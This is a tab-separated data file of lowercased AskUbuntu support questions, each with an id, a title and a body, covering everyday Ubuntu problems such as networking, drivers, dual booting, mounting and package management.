18108	why is ubuntu running slowly on this computer ?	i 'm running ubuntu lucid lynx on the following config : 2gb ddr2 ram 1.50ghz core2duo nvidia 128mb 8400gs gfx card due to some reason the entire operating system feels laggy . the window manager , firefox and rhythmbox and almost all apps feel a bit slow . there is almost a second time lag between the time i press ctrl+t to open a new tab on firefox and the time it actually opens . this site itself renders in frames and the scrolling up and down is a pain . rhythmbox takes 1 sec to maximize and minimize and i cant even dream of a changing the workspace . my question is if windows 7 is running perfectly on my comp why isnt ubuntu ? i really hope there is a way because i would love to ditch windows and move over to linux full time . is there anyone for whom ubuntu works as it should while running a similar config ? thanks
18110	wired network connection active , but firefox not detecting connection	i 'm using a wired network connection that should be manually configured . which is working in my parallel boot windows xp . but in my ubuntu 10.10 after giving same values of ip address , subnet mask , default gateway and dns servers the wired network connection is shown as active but firefox is not detecting any connection .
18112	how do i configure ruby on rails to always use mysql as the default database ?	how do i configure ruby on rails to always use mysql as the default database ? i am a newbie and i just installed ruby on rails and mysql and by default ror uses sqlite3 , but when i configure the db file to use mysql instead of sqlite3 , it gives all sorts of errors . i tried installing the ruby mysql gem , but still more errors . should i just do another clean installation of ubuntu ? i 'm currently using ver 10.10 .
18118	suggestion for an application to do our company car fleet management	( as suggested i 've tried asking on webapps with no luck ... so i try on askubuntu : i 'll be luckier : ) ) hello , everybody ! our company could be a little more open source and a little `` ubuntier '' if i can find an easy and user friendly web application ( we already have our lamp server based on ubuntu 10.04 lts ) to handle company 's car fleet expenses and repairs planning . any hints ? : ) thanks for any kind of help .
18120	an alternative to the super key on an old keyboard	i 've got a classic m-series ibm keyboard that i want to put to a use . however , it does not have a windows ( a.k.a super ) key , that i use for many windows-manager-related shortcuts . on top of it , i use emacs , so many alt or ctrl shortcuts are already taken . i also ca n't use caps lock as a modifier , since that it is taken for switching between languages . what keyboard shortcuts would you recommend me for the windows manager ( gnome w. emerald ) , taking into account these limitations ( no super key , ca n't remap caps , and must not collide with frequent emacs shortcuts ) ?
18121	how do i set up my laptop for dual boot ?	i suppose to buy a laptop and want to install linux os ( not decided which distribution to use ) , and i have a large volume of data with the ntfs format drive externally . how do i need to format my laptop hard-drive ? ( i mean to which format ) . and if i need to install windows on it after that , can i do it ? is it possible ? further , to which format do i need to format my laptop hard-drive , if i want to access the files in the hard-drive from both oss ( linux and windows ) ? thanks in advanced .
18125	wubi installation broken by update - now unable to mount	as of today , my wubi installation of ubuntu wo n't boot ( goes straight to 'minimal bash-like interface ) and i am unable to mount it when i boot straight to ubuntu . if i boot straight into ubuntu ( not using wubi , not going via windows ) , i am able to mount the windows partition and see the wubi partition there : sudo mount -t ntfs /dev/sda5 /media/winxp and from there i can see the wubi root disk : /media/winxp/ubuntu/disks/root.disk but if i try to mount this : sudo mount -o loop /media/winxp/ubuntu/disks/root.disk /media/wubi i get an error : /media/winxp/ubuntu/disks/root.disk input/output error if i then try fsck : sudo fsck /media/winxp/ubuntu/disks/root.disk i get this : input/output error while trying to open /media/winxp/ubuntu/disks/root.disk the superblock could not be read or does not describe a correct etx2 filesystem . if the device is valid and it really contains an ext2 filesystem ( and not swap or ufs or something else ) , then the superblock is corrupt and you might want to try running e2fsk with an alternate superblock : e2fsck -b 8193 < device ... this gives me the same result . there is data on this partition that i really need to be able to access , so i ca n't delete and reinstall . any help much appreciated . thanks .
18127	squid3 starts and stops slowly	on my ubuntu machine i have squid3 as a daemon which starts at boot . but squid3 takes a long time to start and stop ( alomst more than 30 seconds ) . so it has slowed down my os startup and shutdown time considerably .
18132	will unity be considered as interface for kubuntu ?	i 'm hearing as how unity is using nux ( and not gtk ) for its gui . i realise that it 's tangled up with compiz somehow , but i wonder if anyone has considered unity as the future interface for kubuntu ... so , is it technically feasible and has it been considered ?
18139	how to write an fstab line for full access to an ntfs drive ?	i 've written : /dev/sda2 /win ntfs-3g rw , dev , exec , auto , async , users , umask=777 , uid=1000 , gid=1000 , locale=en_us.utf8 , errors=remount-ro 0 0 but i still ca n't access /win as a user ( corresponding to uid/gid specified ) . as root i can access /win and can see that no permissions are set at all ( i supposed umask=777 is meant to set all permissions ) .
18142	lubuntu as an official derivative of ubuntu	the four main desktop environments are gnome , kde , xfce and lxde . while kubuntu and xubuntu are considered official derivatives of ubuntu , lubuntu is not . why is that so ? update : lubuntu has gained official status in 11.10 .
18144	how can i enable flick to scroll ?	is there a setting or a package to enable flick to scroll on ubuntu ? i 'd like to use this with my apple magic mouse and the two-finger scroll feature of my trackpad .
18148	livecd ( liveusb ) ramdisk size	what is the boot kernel option ( casper ) to change the size of the ram root file system when booting from livecd . i want to be able to install few packages to work with , w/o really installing the system .
18150	syntek web cam is not found	here is the output from lsusb : bus 002 device 003 : id 174f:6a33 syntek web cam - asus f3sa , f9j , f9ss it seems to be installed but cheese software still does n't find it on start up ( skype does the same : ) do i need to switch the camera on somehow ?
18151	is there a quality-saving photo zoom plugin for gimp ?	for photoshop there is genuine fractals plugin to increase image resolution with very little loss in visual quality . is there an analogue for gimp ?
18154	how to convince friends using windows and mac to switch to ubuntu	how can i convince my sceptical friends using windows and mac to switch to ubuntu ?
18157	size of partitions during ubuntu install	i think it would be very helpful to users , if they could know beforehand exactly how much disk space they should allocate while opting for advanced partition method during an ubuntu installation . that would be helpful for** / , /boot , /home , swap **and other partitions .
18165	how to set dolphin selected entry active ?	guys , i 'm with a little problem here . this version of kde ( 4.5.1 - default of kubuntu ) has a strange thing with dolphin - the file manager . when i click on a menu entry it becomes active ( blue ) but when i click on the window content it goes lighter . how do i set permantely to blue ? that is , how can i have the blue color even when i click on the content window ? this was the default behavior on the old version of kde ( 4.0x -- 4.4x ) here is the example : active : clicking on the folder content :
18166	how to install wacom intous 4 driver ?	i did a lot of searches on google in how to install intous 4 driver , but i could n't find anything that worked until now . i am looking for step by step installation tutorial to install the driver . and how can i check that everything is configured correctly ?
18167	minimize fullscreen application	how can i minimize a fullscreen application ? alt-f9 does not seem to have any effect on fullscreen windows . more specifically , i 'm running boxee in fullscreen on ubuntu 10.10 . and when boxee hangs , i want to minimize the window so i can kill it .
18170	how to reboot into windows from ubuntu ?	i 'm looking for a way to reboot into windows from ubuntu on a 10.10/vista dual boot system . the specific use case is that i would like to be able to ssh into my running ubuntu instance and issue a command that will initiate a reboot directly into windows . i found a promising blog post , but the script that it suggests is n't working : # ! /bin/bash windows_entry=`grep menuentry /boot/grub/grub.cfg | grep -- line-number windows` menu_number= $ ( ( `echo $ windows_entry | sed -e `` s/ : . *// '' ` - 1 ) ) sudo grub-reboot $ menu_number sudo reboot man grub-reboot is n't much help , but it seems to be leading me in the right direction : set the default boot entry for grub , for the next boot only windows_entry=`grep menuentry /boot/grub/grub.cfg | grep -- line-number windows` menu_number= $ ( ( `echo $ windows_entry | sed -e `` s/ : . *// '' ` - 1 ) ) echo $ menu_number this returns the expected value , but on reboot the first menu entry is still highlighted . any ideas why this is n't working or suggestions for other solutions ?
18172	how do i switch to unicode entry mode ?	i am trying to switch into unicode entry mode using ctrl + shift + u , but after i hit this combination nothing happens . i also tried ctrl + u , ctrl + alt + u . do i need to enable this mode anywhere ? or maybe it works only in certain places ? i use default usa layout .
18173	very low webcam framerate in dell mini 10	the framerate of the built in webcam of my dell mini 10 ( inspiron 1010 ) is extremely slow ( may be 1 frame every 10 seconds ) . initially i could n't see the webcam image . after following the instruction from this previous questions webcam not recognized in dell mini 10v on lucid lynx . how to troubleshoot ? my webcam wont work - how do i debug ? i executed gstreamer-properties and change the video default output from `` x window system ( x11/xshm/xv ) '' to `` x window system ( no xv ) '' . now i can see the webcam image , but with a very low frame rate . any idea about how to solve this ? i am running 10.04
18175	how to change desktop settings back after using gksudo nautilus ?	when i use gksudo nautilus to browse folders that are owned by root , my ubuntu desktop returns to some kind of default setting - changing my wallpaper and displaying desktop icons ( which i do n't usually display ) . however , without manually changing the settings , i can not find a way to make the settings return to my own preferences after closing the root file browser . is there any way to do this ? i tried quitting then restarting nautilus from the terminal but that does n't work . note : i am using ubuntu 10.04 . edit : at scaine 's request , here is the output of gksudo nautilus : ( gksudo:20400 ) : gtk-warning ** : theme directory scalable/places/mimetypes of theme se-interface-green has no size field ( gksudo:20400 ) : gtk-warning ** : theme directory scalable/devices/scalable/emblems of theme se-interface-green has no size field initializing nautilus-gdu extension initializing nautilus-dropbox 0.6.7
18177	generate powerpoint slides automatically	i 'm often faced with the tedious task of generating a powerpoint from a collection of pictures . each picture is to be placed with in its own slide , centered and enlarged so that it fills the screen . is there way to do this with openoffice , python or some other tool in the repository ?
18178	black screen after `` lock screen ''	i 'm using a new hp home g42-215br notebook , which uses an intel hd graphics gpu ( i915 kernel driver ) . my ubuntu 10.10 installation is new and is up-to-date . when i choose to lock screen in the menu and close the lid , if i reopen the lid within a short period of time everything works . but if it stays idle for a while and i reopen the lid , i do n't get the login screen . all that i can see is a black screen with my mouse cursor . i can switch to tty1 ( which works ) with no problem , but switching back to tty7 does n't helps , i ca n't get the login screen anymore . i do n't want to have to reboot all the time i lock the screen ... any ideas ?
18179	h264 video looks interlaced	i have a new video cam which records in h.264 . in windows the videos play fine , but in linux they look interlaced . what can it be ? i get the best result with vlc but they still are interlaced edit : here 's a short video http : //www.mauriziopz.eu/ricette/wp-content/uploads/2010/12/m2u00156.mpg and here 's what i see [ http : //www.mauriziopz.eu/ricette/wp-content/uploads/2010/12/schermata1.png it is an nvidea
18180	program to press a key at timed intervals	i was wondering if there was an open source program that would allow me to have a certain keystroke/key combination pressed every say , two seconds or so . forgive me , i merely do not know what a program like this would be called . thanks !
18187	how can i see the last time a program was run ?	is there any way i can see what programs were running at a specific time ? is there a way to see the last time a program was run ? i 'm trying to see if a certain program was running yesterday because i suspect it may have been affecting the program i was using . any suggestions ?
18188	how to move a lamp setup to a new ubuntu server ?	i have an old ubuntu lamp server . i 'd like to move the webpage over to a newer ubuntu server and i 'm wondering what the easiest way to backup and restore the webpage would be ? or just the easiest way to transfer the settings to a new server . the first idea that came to my mind was just to set up a new lamp server and then recreate the database , import the data , ... but there must be a better way , right ? : ) thanks for your help ! !
18192	how to fake a package version installed ?	being an early adopter and using 11.04 daily builds i sometimes meet a situation when some packages require earlier versions of other packages than those i have installed . usually newer ( but refused ) versions of needed packages provide all the functionality of their older versions . if i use dpkg -i -- force-depends-version to install dependent packages everything works fine , i 've never seen a problem . instead of manually downloading and installing every package , can i just make the system pretend there is a specific package version installed when there is a newer ? or is there a -- force-depends-version key equivalent for apt-get ?
18194	can you recommend a good tutorial on building custom package versions ?	after installing ubuntu 11.04 i was disappointed by the fact there are still scala 2.7 ( when 2.8 is long ago current actual branch ) and mono 2.6 ( when pretty a time has passed after 2.8 release ) . i am not sure i could build all the packages for mono myself , but i 'd like to try making my own custom version of scala package ( and i want my system to accept it not as a different package but a version of the original , so that if i put it into a configured repository , the system will automatically upgrade to it from currently installed original 2.7 ) . can you recommend a good tutorial on this subject ( ubuntu deb packages building and hacking for beginners ) ?
18197	how can i get my microsoft wireless mobile mouse to work ?	i recently got a sony vaio vpceb series laptop and i tried hooking in my external microsoft wireless mobile mouse 4000 into the computer ( it has a small usb flash drive that hooks into the computer ) . i suppose i need some driver ? or perhaps i just need to edit some file ? i also thought it might be the usb ports not working , but i tried a different usb device and it worked fine . any ideas ? thanks !
18198	is there a good ambience theme for xubuntu ( xfce , xfwm ) ?	looks ridiculous , but i ca n't find ambience theme for xfce out the in the internet ( while there are even couple of pretty good versions for windows xp ) . could you share a link ? i even do n't require everything ( like controls and icons ) look exactly like it does in original ubuntu ambiance , i just want window decorations ( better with controls on the right though ) and a colours scheme ( for example dark menu bars instead of default blue ones ) . ps : i 'd prefer not to install gnome and metacity .
18200	how to correctly remove a ppa source ?	if i 've added a ppa with `` sudo add-apt-repository '' should i just delete a file in /etc/apt/sources.list.d , or there is a command for removal ?
18206	keyboard properties : what does `` add default action to menu key '' mean ?	in the keyboard configuration ( gnome-keyboard-properties ) under `` behavior of alt/windows keys '' , there is an option `` add default action to the menu key '' . what does that even mean , and why is n't it documented anywhere ? ( i 'm using a german ubuntu 10.04 , so the text in the dialog might be slightly different in english . )
18208	volume control command	is there a way to control volume of a remote system via ssh ? we have a media center server and we want to remotely control the volume .
18215	ca n't access external hard drives or thumb drives	i just installed ubuntu 10.10 onto my laptop . everything is working great however usb devices such as thumb drives and external hard drives wont show up . i have been looking around a bit and when i run sudo fdisk -l it displays this : disk /dev/sda : 250.1 gb , 250059350016 bytes 255 heads , 63 sectors/track , 30401 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00065684 device boot start end blocks id system /dev/sda1 * 1 29255 234983424 83 linux /dev/sda2 29255 30402 9212929 5 extended /dev/sda5 29255 30402 9212928 82 linux swap / solaris disk /dev/sdb : 16.0 gb , 16026435072 bytes 64 heads , 32 sectors/track , 15283 cylinders units = cylinders of 2048 * 512 = 1048576 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000df90d device boot start end blocks id system /dev/sdb1 * 1 15283 15649776 7 hpfs/ntfs it does seem to display my 16 gig thumb drive but other then seeing it here i cant access it to read and write files to it . it does the same with my external hard drive . i know those devices work as i have tried them on my other computer and they are working fine . also this is what is in fstab if this will help anyone : proc /proc proc nodev , noexec , nosuid 0 0 /dev/sdb1 / ext4 errors=remount-ro 0 1 /dev/sdb5 none swap sw 0 0
18216	how to set-up xubuntu to show applications menu on desktop right-click ?	as far as i know , in older versions of xfce this was a default behaviour - `` applications '' menu was popped-up immediately on desktop mouse right-click . but now `` applications '' menu appears as a sub-menu in a folder-class context menu which pops up instead . i never store any files on the desktop , so `` create folder '' , `` open terminal here '' menu items are useless for me to have on the desktop , instead i 'd like `` applications '' menu to open when i right-click on the desktop . from using archlinux i can remember that there was a special package to install to address this issue . is there such a package ( or another solution ) available for xubuntu ?
18222	how to prevent system applications ( like the software center ) from asking for password ?	i 'd like software center , update manager and some other system management applications to work without asking for password ( like sudo does if configured with nopasswd ) but only asking for a confirmation instead , or even without any confirmation . at the same time i would n't like to use no user password at all . is this reachable ?
18228	problem with wake after suspend using usb remote	i 'm a linux newbie looking for some help . i 'm currently setting up an xbmc htpc using a laptop and 10.10 and all works great except for waking from resume using the power button on the remote . the suspend works from remote works fine as does the resume using the power button on the laptop . i 've checked /proc/acpi/wakeup which initially showed the following . device s-state status sysfs node c096 s5 *disabled pci:0000:00:1e.0 c0f1 s3 *disabled pci:0000:00:1d.0 c0f8 s3 *disabled pci:0000:00:1d.1 c0f9 s3 *disabled pci:0000:00:1d.2 c0fa s3 *disabled pci:0000:00:1d.3 c0fb s3 *disabled pci:0000:00:1d.7 c102 s5 *disabled pci:0000:00:1c.0 c22b s5 *disabled pci:0000:08:00.0 c115 s5 *disabled pci:0000:00:1c.2 c22c s5 *disabled c118 s5 *disabled pci:0000:00:1c.3 c22c s5 *disabled i 've since configured the above so that the s3 devices above are enabled . i 've confirmed that they are the correct devices using lspci 00:1d.0 usb controller : intel corporation n10/ich 7 family usb uhci controller # 1 ( rev 01 ) 00:1d.1 usb controller : intel corporation n10/ich 7 family usb uhci controller # 2 ( rev 01 ) 00:1d.2 usb controller : intel corporation n10/ich 7 family usb uhci controller # 3 ( rev 01 ) 00:1d.3 usb controller : intel corporation n10/ich 7 family usb uhci controller # 4 ( rev 01 ) 00:1d.7 usb controller : intel corporation n10/ich 7 family usb2 ehci controller ( rev 01 ) none of this has worked unfortunately and i 'm now stuck . it simply refuses to wakeup from the remote . the usb receiver shows no activity led while suspended . suspend/resume from the remote works fine from windows 7 so i know the laptop is ok with it . any ideas ? i need to get this sorted to gain wife approval for this system . thanks , bod .
18229	how can i automount my hard disk partitions ?	how can i auto-mount all my hard disk partitions ?
18232	blocking remote login	last night , i was shutting down my server and i saw a message asking if i wanted to shut down a `` pts/0 '' session . odd , i thought . so i logged back in and did a finger and saw that there was someone logged in from a remote ip address ( an italian address ) and they were issueing lots of scanssh commands . they had also changed the password for the account they had logged in as ( it was my child 's account and the password was easy to guess - he 's only 6 ! ) . ok , so i left some ports open - my fault entirely . i was fortunate that the account is limited . there was also a file called w2ksp3.exe ( or something similar ) in the account 's home folder . so i guess someone was using my server to look for compromised windows ' pcs . so , my network looks like this : internet - eth0 - server - eth1 - lan and it was the server that was compromised . the server is using dnsmasq for dns lookups and a dhcp server for the lan . this leads me to two questions : how do i configure the firewall ( iptables ? ) to block everything on eth0 apart from http , outgoing ftp , e-mail and anything else needed to access the internet ? how do i stop logins via eth0 but allow them via eth1
18234	jumping to address bar in nautilus like f6 in windows	how can i go to the address bar in nautlius using the keyboard ? i find it annoying to have the mouse each time i want to copy the path of some files . not to mention that nautilus by default do n't have an address bar , so i need to spend to keep clicking buttons and menu items until i get the address ! ! any idea ?
18236	pasting clipboard contents into terminal	how can i paste clipboard contents into terminal without having to right click then press the `` paste '' menu item ? ctrl-v does n't work here !
18242	oki-b2540 printer does n't print ?	there is a driver for the oki-b2520 , and it is automatically selected when the printer is connected . from looking at various websites , it seems like the b2500 , b2520 , and b2540 all work perfectly fine with the oki-b2520 driver , so i let it install that . everything went smoothly , the printer shows up as available , and i can queue jobs without any problems , and they disappear after a few seconds . however , nothing actually comes out . there is no error message on the printer display , or from ubuntu . this is the output from the cups error log : http : //pastebin.com/s6ifzaup so my question is : what is wrong ? ?
18243	moving windows from the keyboard	is it possible to move windows from the keyboard itself without touching the mouse ? i know i can do a alt + left click and drag the window , however i am hoping there is something i can use to move it from the keyboard without the mouse .
18248	how to change ubuntu into lubuntu ?	i want to install lubuntu on my old desktop with 128mb of ram . as the memory is not enough to run the graphical installer , i had to follow the minimal install from a minimal.iso file as described here . however , halfway through the installation when the installer asked me which software i wanted to choose ( the list that includes mail server , openssh server ... ) i chose ubuntu-netbook . that was stupid , because my ram is really too bad for anything standard . now let 's say i have ubuntu ( actually the netbook thing , but that does n't make any difference in this question i think ) . i have also installed lubuntu-desktop so i have lubuntu as well . how can i remove the things that came with ubuntu , to keep only a fresh lubuntu installation ?
18249	no sound when monitor is turned off	i 'm running ubuntu 10.10 on a revo r3610 nettop with integrated sound ( intel hda ) and graphics ( nvidia ion ) . when i boot up with the monitor turned on everything works fine . if i then turn off the monitor sound continues to work as normal . however if i boot up with the monitor turned off , i can not play sound . when i turn on the monitor , it just suspends itself without displaying a picture . if i vnc to the box , the sound icon in the tray shows as muted ( three dashes ) and nothing is shown in the hardware sound devices panel . the sound card still shows up in an lspci listing though . the monitor is connected via hdmi and the sound is via 3.5mm headphone jack to an external amp . the monitor also has integrated speakers but these are not in use . edit : i 've also noticed that the computer only goes to sleep/suspend when it was booted up with the monitor plugged in . otherwise it stays on all the time . it seems that some part of gnome is not being started properly when it ca n't find the monitor .
18251	visual effects are not highlighted	i installed ubuntu-netbook edition on my laptop , in system â preferences â appearance , visual effects were not highlighted , so is there anyway to enable it ? now i 'm using desktop mode at login .
18252	how to get racket in maverick ?	is there a ppa or a package somewhere ?
18260	audio input disappears randomly	same question asked in launchpad and ubuntu forums and linuxquestions i 'm running lubuntu 10.10 on a hp compaq nx6325 . i use it to digitize tape records - connecting the tape deck 's headphone output to the notebook 's microphone input . audacity then records the 45 minutes of sound . however , from time to time , audio input just disappears . there is no data incoming ; instead of audacity recording silence , the track cursor completely stops in its way . when using gnome-sound-recorder , the clock counter stays greyed out even though i start recording . issuing sudo alsa force-reload fixes things again . the system logs show little useful , although i can post the more relevant parts if asked . does alsa ( or pulseaudio ) have some kind of log somewhere ? can i make one ? is there any other or better way to find the problem ?
18262	is the copy speed from ext4 to ntfs the same as from ntfs to ntfs ?	i 've created a file sharing server with ubuntu server and samba , the drive for sharing is on ext4 , but all the users are on windows 7/xp would the copy speed be faster if the drive would be on ntfs ?
18263	losing ssh connection when exiting from the main console login	i have installed openssh-server from synaptics , as usual , on a brand new ubuntu desktop computer , 10.10 , with all updates and patches implemented . if i have the local console logged in , i can ssh to the box , with no problem . if the local console is not logged in , i can not ssh to the box . and if i have an ssh connection currently running , and log out of the local console , the ssh session will soon after be disconnected . looks to me like the network connection is only working when a user is actually logged in ubuntu . is this normal behavior ? is there a way to avoid this ? merci !
18271	no video during install on hp 8440w	i have a hp elitebook 8440w that i 'm trying to run ubuntu 10.10 live , to see how everything is if i were to install it to the hd . the system boot 's up to the usb key i made and makes the pretty ubuntu booting sound then the screen goes dark and never comes back . i 'm guess no nvidea quadro fx 380m video drivers ? any ideas ?
18274	maverick userland under lucid 10.04 for newer x11 and graphics use	my main system runs on lucid lynx 10.04 , and since it 's running rather well i do not wish to upgrade yet . however the graphics chipset x1700/v5250 does n't work well for games . the open source driver is insufficient . and the substandard vendor does n't bother to release the binary driver for current xorg versions . so that made me pondering options . the notion of using the xorg-edgers ppa makes me shiver . but i assume it might be possible to install another ubuntu version as separate userland debootstraped onto my system . hardy heron 8.04 would be a good idea if i wanted to persue the binary driver option . this would give me an older xorg , but i 'm very unsure if that fglrx/catalyst driver would be compatible with the 10.04 kernel - since the binary driver needs some kernel hook i believe . i 've just tested maverick , and the open source driver is objectively faster than the lucid version ( tested a few 2d/3d games ) . so this might be a better option . i 'm unsure if i will see the same effects , if i just install the 10.10 userland and xorg . so that 's my question . can a debootstrap 10.10 setup /maverick/ actually work under a lucid basesysten ? any caveats for the installation ? and would it be possible to leave my main xorg running , and chroot into /maverick/ and run the newer xorg on another vt ? alternative : is there a simpler way than debootstrap to install a secondary lucid lynx side-by-side ( no partition ) so i can toy with xorg-edgers safely ?
18277	simple gnome panel applet to fetch data periodically over http ?	i 'm looking for simple gnome-panel applet that can fetch data ( text ) from url and display that on gnome panel . loading data every 30 seconds . i would like to use this for display data from personal weather station . on http : //lanip/weather.php i could output plain text : -14*c , 7.7m/s and it gets displayed on gnome panel .
18279	uninstall evince while retaining update and upgrade ability	i tried to uninstall evince but got a message that doing so would remove ubuntu-desktop which appears to be needed to update or upgrade the system . can we remove evince and retain update and upgrade ability ? ( note that in case things are packaged differently in future , make sure no wanted packages are removed when evince is uninstalled . )
18282	rebuild /dev accidentally deleted	how to rebuild /dev on an ubuntu lucid where all files in /dev were accidentally deleted ? makedev std and makedev pty are n't enough , which is n't surprising on a system under udev . i have n't reboot yet because i fear to loose access to my system .
18283	how do i set up my own local update repository ?	possible duplicates : is it possible to mirror the apt repositories ? how to set up an apt repository ? can i construct a local repository , and manage updates for other ubuntu-desktop remotely ? ? if yes , could you help me with the steps ?
18286	desktop settings lost after unclean shutdown	my laptop restarted because the battery ran out of juice . now the gnome settings are gone . the panels are looking very bad . i am hearing sounds that were not there before restart . menus are not appearing nor are the launchers that i added to the panel . how do i get my previous settings back ?
18292	determining the source for a package upgrade	running aptitude dist-upgrade on my system currently results in an attempt to upgrade a few packages . all of these packages are being flagged as `` untrusted packages '' which `` could compromise your system 's security '' . i have just recently added a new untrusted source to /etc/apt/sources.list.d , but i did n't expect that it would include any/all of these packages . how can i find out which source is providing the newer versions of these packages ? update thanks to karthick87 for an informative response . with that assistance , i was able to troubleshoot the underlying issue , which may itself be of interest to some readers . it turned out that at least some of the updates in question were to be fetched from an official ubuntu mirror . i had been using that mirror without issues for some months now . i have done numerous dist-upgrades since upgrading to maverick . it looks like the issue is the same described by this bug report . i 've been able to resolve my problems by editing /etc/apt/sources.list to use the [ cc ] anonical repository with lines like these : deb http : //archive.ubuntu.com/ubuntu maverick main universe restricted multiverse deb-src http : //archive.ubuntu.com/ubuntu maverick main universe restricted multiverse deb http : //archive.ubuntu.com/ubuntu maverick-updates main universe restricted multiverse deb-src http : //archive.ubuntu.com/ubuntu maverick-updates main universe restricted multiverse deb http : //security.ubuntu.com/ubuntu maverick-security main universe restricted multiverse deb-src http : //security.ubuntu.com/ubuntu maverick-security main universe restricted multiverse after making the edits , i did sudo aptitude update ; sudo aptitude dist-upgrade and did not get the warning message .
18293	ubuntu restricting download speed to 15kbps	i used a 3g broadband modem . i usually would be able to get a download speed of 40 - 60 kbps when i still used windows . but it seems ubuntu has a way of restricting downloads to 15kbps . this happens for streaming sites ( youtube ) , synaptics/apt-get . the only way for me to avi . modem model : huawei ec226 , cdma2000 ev-do rev.a , usb modem , fcc id : qisec226 computer model : hp dv5 and hp dv4
18297	list of free mmos for ubuntu	is there a list of free mmorpg games for ubuntu somewhere ? i know of regnum online . any others ?
18298	can i overamplify a microphone input ?	i am experiencing a persistent problem with sound input from internal microphone on my asus k52f laptop ( icore m350 , ubuntu 10.10 ) . it produces low level skype input . is it possible artificially amplify input level , by mean of software/tool ?
18302	creating .xpi file for ff	ok so i downloaded the source code of an addon for firefox , that was a .xpi file so i extracted that , changed some functions and now i would like to recreate a .xpi file so i can test it in firefox . can anyone tell me how to do this ?
18305	screen resolution and dual monitors	on my laptop , when i have dual monitors , my laptop screen resolution is 1680x1050 . nevertheless , when i disconect the second screen and restart the laptop , the screen resolution drop to 1400x1050 and i have no opportunity to set it back to 1680x1050 . any idea why i only get the right resolution of my laptop screen in dual monitors ?
18306	broken rmvb file not allows to use progress bar in `` movie player ''	i am able to open broken rmvb file in `` movie player '' , but i 'm not able to use progress bar ( eg . to skip intro of movie or jump to specific scene etc ) . i would like to avoid installing mplayer . is there a quick way to install better codecs for rmvb format for `` movie player '' ? [ i have noted that `` movie player '' allow not allow to use progress bar only for broken rmvb files ]
18311	wired connection not working	i am using a acer aspire one . here is the ubuntu wiki page about my computer . i have a working wireless connection however when i plug a cat5 ( ethernet ) cable in the lights flicker on the computer , but then nothing happens . output of iconfig : eth0 link encap : ethernet hwaddr 00:1e:68:96:1a:6b inet6 addr : fe80 : :21e:68ff : fe96:1a6b/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:43 errors:0 dropped:0 overruns:0 frame:0 tx packets:12 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:2622 ( 2.6 kb ) tx bytes:936 ( 936.0 b ) interrupt:28 base address:0xe000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:8 errors:0 dropped:0 overruns:0 frame:0 tx packets:8 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:480 ( 480.0 b ) tx bytes:480 ( 480.0 b ) wlan0 link encap : ethernet hwaddr 00:22:68:92:7f:36 inet addr:192.168.1.6 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :222:68ff : fe92:7f36/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:5702 errors:0 dropped:0 overruns:0 frame:0 tx packets:5284 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:4117327 ( 4.1 mb ) tx bytes:936709 ( 936.7 kb ) any understanding of this output is greatly appreciated .
18313	i can´t boot into ubuntu strange error	somehow just after rebooting my pc , ubuntu wouldn´t boot giving me this error , i seriously don´t know what happened but im sure it can be fixed http : //img209.imageshack.us/i/p2012101545.jpg/
18318	how do i hide a user from the login list ?	i 'm setting ubuntu 10.10 up on my father 's desktop and have two user accounts , his and mine ( for remote administration purposes ) . how can i hide ( but not delete ) my user from the login list ?
18327	can i import contacts without syncing ?	i do n't have a mobile , my laptops rarely leave home , but occasionally i would like to make a file available to myself ( or someone else ) away from home . hence my foray into ubuntu one . my address book rarely changes , so i really need little in the way of syncing , but i do want to add a bunch of my contacts to my cloud so that they are available to me elsewhere . all i wish to do is export contacts from my home computer and import them to my cloud using ldif or csv files rather than re-typing 60+ addresses or installing yet another full e-mail client ( evolution ) just to get addresses into my cloud . suggestions ?
18328	expect script that enters a username and password	i am trying to run an expect script , that everytime the prompt says user @ blah 's password , it enters the password i have the following expect script but it seem to be acting up . can anyone tell me what i am doing wrong ? this prompt comes up multiple times over the command i run so i need it to enter the password every time , it sees user @ blah 's password . # ! /usr/bin/expect global env set timeout 10 spawn command that requires password expect `` ^user '' send `` password\r '' please and thank you .
18332	splash screen not showing up ?	when i boot up ubuntu , all i get is a little blinking underscore at the top left side of my screen . i am using splash screen manager and activated a picture to start at boot up , but it does n't show up .
18335	ca n't get my blue snowflake mic to work	it was working fine when i bought it . i think it was an update or something that made it stop . i do n't think the mic is broken , at least i hope not . can anyone help ? please ? i need it before tommorrow . i 'm working on a video . i get this when i check the terminal for what usb devices are connected : bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 004 : id 2525:8912 bus 003 device 003 : id 058f:9360 alcor micro corp. 8-in-1 media card reader bus 003 device 002 : id 056a:00d2 wacom co. , ltd bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub thanks .
18338	gnome indicator applet not showing same items on two computers	i have one computer running lucid and another one that i recently upgraded to maverick . up until today , i was using awn with maverick , including their custom indicator applets . i 've decided to switch back to the default gnome panels with dockbarx , but when i add the indicator applet to my panel , it 's not displaying the same items as the applet on my lucid machine . in particular , the network and dropbox icons are not displaying . when i look at the about entry for the apps , lucid shows version 0.3.7 , whereas maverick shows 0.4.6 . did they really remove the network information from the applet in maverick , or do i need to do something to enable it ? my network is very definitely connected , as i still have awn running and can see the icon there . ( a second question , although not particularly important : the applet does n't inherit the transparency of the panel it 's living on - any way to change that ? )
